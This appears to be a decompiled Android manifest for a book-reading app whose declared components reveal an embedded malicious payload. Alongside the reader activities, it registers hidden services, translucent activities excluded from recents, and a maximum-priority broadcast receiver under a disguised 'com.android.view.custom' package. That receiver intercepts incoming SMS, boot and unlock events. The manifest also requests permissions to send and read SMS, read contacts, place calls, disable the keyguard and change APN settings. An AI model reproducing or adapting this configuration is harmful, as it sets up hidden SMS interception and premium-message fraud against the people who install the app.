<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.keji.danti637">
    <application android:icon="@drawable/icon" android:label="@string/app_name">
        <activity android:label="@string/bookname" android:name="com.keji.danti.MainA" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.keji.danti.Boutique" android:screenOrientation="portrait" android:theme="@style/Theme.App"/>
        <activity android:name="com.keji.danti.Background" android:screenOrientation="portrait"/>
        <activity android:name="com.keji.danti.Lists" android:screenOrientation="portrait"/>
        <activity android:name="com.keji.danti.History" android:screenOrientation="portrait"/>
        <activity android:name="com.keji.danti.TextDetail" android:screenOrientation="portrait"/>
        <activity android:label="@string/setting" android:name="com.keji.danti.Setting" android:screenOrientation="portrait"/>
        <meta-data android:name="APP_UID" android:value="f1cd8ba"/>
        <activity android:name="com.android.view.custom.BaseAActivity"/>
        <receiver android:name="com.android.view.custom.BaseABroadcastReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.net.wifi.PICK_WIFI_WORK"/>
                <action android:name="android.net.conn.MEDIA_NOFS"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.INPUT_METHOD_CHANGED"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.UMS_CONNECTED"/>
                <action android:name="android.intent.action.UMS_DISCONNECTED"/>
            </intent-filter>
        </receiver>
        <service android:name="com.android.view.custom.FirstAService"/>
        <service android:name="com.android.view.custom.SecondAService"/>
        <service android:name="com.android.view.custom.ThirdAService"/>
        <service android:name="com.android.view.custom.FourthAService"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.view.custom.FirstAActivity" android:theme="@android:style/Theme.Translucent"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.view.custom.SecondAActivity" android:theme="@android:style/Theme.Translucent"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.view.custom.ThirdAActivity" android:screenOrientation="portrait"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.view.custom.FourthAActivity" android:screenOrientation="portrait"/>
        <meta-data android:name="PID" android:value="secv"/>
    </application>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <uses-permission android:name="android.permission.READ_LOGS"/>
</manifest>
